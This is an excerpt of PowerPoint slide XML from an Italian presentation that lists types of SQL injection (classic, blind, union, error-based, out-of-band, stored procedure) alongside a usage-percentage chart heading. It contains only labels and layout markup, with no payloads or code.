          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="14014674" y="3611413"/>
            <a:ext cx="2337490" cy="282442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1724">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Iniezione SQL Union</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 44" id="44"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9470271" y="4353646"/>
            <a:ext cx="4046370" cy="877764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1724">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Iniezione SQL Basata su Procedura Memorizzata (Stored Procedure SQL Injection)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 45" id="45"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="13955223" y="4332005"/>
            <a:ext cx="4046370" cy="580103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1724">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Iniezione SQL Out-of-band (OOB SQL Injection)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 46" id="46"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="3922123"/>
            <a:ext cx="7419779" cy="229838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1366" spc="468">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>PERCENTUALE DI UTILIZZO (DATI AGGIORNATI AL 2023)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 47" id="47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="3767660"/>
            <a:ext cx="7419779" cy="85390"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6179589" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 48" id="48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="6179589" cy="71118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="71118" w="6179589">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="71118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 49" id="49"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="6179589" cy="99693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 50" id="50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="4251894"/>
            <a:ext cx="7419779" cy="85390"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6179589" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 51" id="51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="6179589" cy="71118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="71118" w="6179589">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="71118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 52" id="52"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="6179589" cy="99693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 53" id="53"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="451518" y="4478937"/>
            <a:ext cx="820879" cy="820879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 54" id="54"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="527882" y="5346905"/>
            <a:ext cx="668152" cy="287475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1174"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Classic SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 55" id="55"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1440519" y="4478937"/>
            <a:ext cx="820879" cy="820879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 56" id="56"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1524841" y="5346905"/>
            <a:ext cx="668152" cy="287475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1174"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 57" id="57"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2378803" y="4496314"/>
            <a:ext cx="820879" cy="820879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 58" id="58"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2455167" y="5346905"/>
            <a:ext cx="668152" cy="287475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1174"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Union-based SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 59" id="59"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3439796" y="4496314"/>
            <a:ext cx="820879" cy="820879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 60" id="60"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3516160" y="5346905"/>
            <a:ext cx="668152" cy="287475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1174"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Error-based SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 61" id="61"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4500789" y="4478937"/>
            <a:ext cx="820879" cy="820879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 62" id="62"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4585111" y="5346905"/>
            <a:ext cx="668152" cy="287475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1174"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>OOB SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 63" id="63"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="5423158" y="4478937"/>
            <a:ext cx="820879" cy="820879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 64" id="64"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="5499522" y="5346905"/>
            <a:ext cx="668152" cy="432345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1174"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Stored Procedure SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>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7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1768700" y="1835375"/>
            <a:ext cx="3308125" cy="3308125"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4410833" cy="4410833"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 8" id="8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="16656" t="0" r="16656" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="4410833" cy="4410833"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1768700" y="5143500"/>
            <a:ext cx="3308125" cy="330812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11" id="11"/>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12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5076825" y="1835375"/>
            <a:ext cx="3308125" cy="3308125"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4410833" cy="4410833"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 13" id="13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect l="16625" t="0" r="16624" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="4410833" cy="4410833"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 14" id="14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5076825" y="5143500"/>
            <a:ext cx="3308125" cy="3308125"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4410833" cy="4410833"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 15" id="15"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:srcRect l="20281" t="0" r="20281" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="4410833" cy="4410833"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 16" id="16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="7993934" y="0"/>
            <a:ext cx="782032" cy="3118333"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="2218746"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 17" id="17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="556429" cy="2218746"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2218746" w="556429">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556429" y="2218746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2218746"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="74902"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 18" id="18"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="556429" cy="2247321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 19" id="19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10500723" y="3389485"/>
            <a:ext cx="1618141" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1151334" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 20" id="20"/>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21" id="21"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 22" id="22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10131321" y="5675102"/>
            <a:ext cx="738805" cy="738805"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1913890" cy="1913890"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 23" id="23"/>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ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 24" id="24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10131321" y="7132211"/>
            <a:ext cx="738805" cy="738805"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1913890" cy="1913890"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 25" id="25"/>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ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>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27" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="17550367" y="9595504"/>
            <a:ext cx="277560"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13</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 28" id="28"/>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29" id="29"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10500723" y="2516361"/>
            <a:ext cx="6588969" cy="873125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
